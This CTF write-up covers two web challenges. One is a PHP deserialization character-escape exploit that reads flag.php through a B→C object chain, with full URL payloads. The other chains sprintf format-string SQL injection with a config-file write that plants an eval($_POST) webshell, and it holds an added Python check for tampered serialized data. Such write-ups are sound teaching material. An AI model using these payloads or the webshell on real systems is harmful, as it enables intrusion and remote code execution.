ANHENG April Spring War-web

Ezunserialize

Opening the page shows the source code:

<?php
show_source("index.php");
function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A{
    public $username;
    public $password;
    function __construct($a, $b){
        $this->username = $a;
        $this->password = $b;
    }
}

class B{
    public $b = 'gqy';
    function __destruct(){
        $c = 'a'.$this->b;
        echo $c;
    }
}

class C{
    public $c;
    function __toString(){
        //flag.php
        echo file_get_contents($this->c);
        return 'nice';
    }
}

$a = new A($_GET['a'],$_GET['b']);
// The step that stores the serialized data is omitted; below it is read back and unserialized
$b = unserialize(read(write(serialize($a))));

You can see that there is a replacement!!! Yes, it is deserialization character escaping again~~~
\0\0\0 is 6 characters, but after read() replaces it with chr(0) . '*' . chr(0) only 3 remain,
and write() is called first, then read(), so the serialized string shrinks while the declared lengths stay the same,
as follows:

We pass 27 \0 in username and 1234";s:3:"age";payload in password.
Since chr(0) is invisible, text is used in its place:
O:1:"A":2:{s:8:"username";s:54:"27 characters";s:8:"password";s:22:"1234";s:3:"age";payload;}
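As an added illustration (not part of the original writeup), here is a Python model of the challenge's write()/read() pair together with a consistency check a defender could run before unserialize(): it verifies that every declared string length still lands on its closing `";` and that every object closes with the property count it declared, which is exactly what the 6-to-3 byte shrink breaks. The serialize_a, stream_consistent and safe_load names are my own and assume ASCII property values.

```python
import re

# Python model of the page's PHP write()/read() helpers (constructed for this example).
def write(data: str) -> str:
    return data.replace("\x00*\x00", r"\0\0\0")

def read(data: str) -> str:
    return data.replace(r"\0\0\0", "\x00*\x00")

def serialize_a(username: str, password: str) -> str:
    """What PHP serialize() emits for class A (two public string properties, ASCII input)."""
    return 'O:1:"A":2:{s:8:"username";s:%d:"%s";s:8:"password";s:%d:"%s";}' % (
        len(username), username, len(password), password)

def stream_consistent(data: str) -> bool:
    """True if every s:N:"..." token really spans N bytes and every object closes with
    exactly the number of properties it declared. Only the token types this page uses
    (O, s, '}') are accepted; anything else is rejected as the safe default."""
    b, i, stack = data.encode("latin-1"), 0, []   # stack: tokens still owed per open object
    while i < len(b):
        if b.startswith(b"s:", i):
            m = re.match(rb's:(\d+):"', b[i:])
            if not m:
                return False
            start, n = i + m.end(), int(m.group(1))
            if b[start + n:start + n + 2] != b'";':
                return False                      # declared length misses the closing '";'
            i = start + n + 2
            if stack:
                stack[-1] -= 1                    # one key or value consumed
        elif b.startswith(b"O:", i):
            m = re.match(rb'O:(\d+):"([^"]*)":(\d+):\{', b[i:])
            if not m or int(m.group(1)) != len(m.group(2)):
                return False
            if stack:
                stack[-1] -= 1                    # the object is the value of the pending key
            stack.append(2 * int(m.group(3)))     # each property costs a key and a value token
            i += m.end()
        elif b[i:i + 1] == b"}":
            if not stack or stack.pop() != 0:
                return False                      # property count differs from what was declared
            i += 1
        else:
            return False
    return not stack

def safe_load(username: str, password: str) -> bool:
    """The page's storage round trip, with the check placed where unserialize() would run."""
    return stream_consistent(read(write(serialize_a(username, password))))
```

A username made of \0 sequences fails the check after the round trip because read() has shortened the stored bytes, while ordinary credentials pass unchanged.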

The serialized payload is built like this:

<?php
class A{
    public $username;
    public $password;
    function __construct($a, $b){
        $this->username = $a;
        $this->password = $b;
    }
}

class B{
    public $b;
    function __construct(){
        $this->b = new C();
    }
}

class C{
    public $c;
    function __construct(){
        $this->c = "flag.php";
    }
}
$a = new A("123",new B());
echo serialize($a);
?>

O:1:"A":2:{s:8:"username";s:3:"123";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}

Then splice that into the escape above~
The payload for this challenge:

a = \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
b = 124";s:3:"age";O:1:"A":2:{s:8:"username";s:3:"123";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}
http://183.129.189.60:10001/index.php?a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=124%22;s:3:%22age%22;O:1:%22A%22:2:{s:8:%22username%22;s:3:%22123%22;s:8:%22password%22;O:1:%22B%22:1:{s:1:%22b%22;O:1:%22C%22:1:{s:1:%22c%22;s:8:%22flag.php%22;}}}

Get the flag:

babytricks

I didn't solve this challenge; here are the points it tests:
1. Format string
Open the source code and you can see the SQL statement:

select * from user where username='$user' and password='%s'

Because the challenge filters single quotes, backslashes, underscores and so on, conventional injection won't work.
Format string: use the placeholder %1$ to swallow the following quotation mark. The code is as follows:

<?php
$user = "%1$";
$pass = " or 1=1#";
$sql = "select * from user where username='$user' and password='%s'";
echo sprintf($sql, $pass);

Output:
select * from user where username='nd password=' or 1=1#'

Since or is also filtered here, we can use ^0 instead, as follows. When we query a non-existent column name, the query still succeeds.
Constructing username=%1$&password=^0# gets the back-end account and password.

2. Getshell from the backend
After logging into the backend we can read the source; a one-liner shell is written through it:

<?php
error_reporting(0);
session_save_path('session');
session_start();
require_once './init.php';
if($_SESSION['login']!=1){
    die("<script>window.location.href='./index.php'</script>");
}
if($_GET['shell']){
    $shell= addslashes($_GET['shell']);
    $file = file_get_contents('./shell.php');
    $file = preg_replace("/\\\$shell = '.*';/s", "\$shell = '{$shell}';", $file);
    file_put_contents('./shell.php', $file);
}else{
    echo "set your shell"."<br>";
    chdir("/");
    highlight_file(dirname(__FILE__)."/admin.php");
}
?>

Master Smile and Master Niu have both written articles on this~~ Orz:
"Classic config-file-writing vulnerabilities and several variants" and
"Small Secret Circle: learning classic config-file-writing vulnerabilities and several variants".
The principle and payload are explained very clearly in those articles!!! Orz
Payload again:

http://183.129.189.60:10006/admin/admin.php?shell=;eval($_POST[y1ng]);
http://183.129.189.60:10006/admin/admin.php?shell=$0

That gets a shell~~~ Too slick!!!

3. Bypass disable_functions
I'll fill this in once the official WP is out; they say there will be a live stream, looking forward to it! For now~~

Source: blog.csdn.net/qq_42967398/article/details/105750166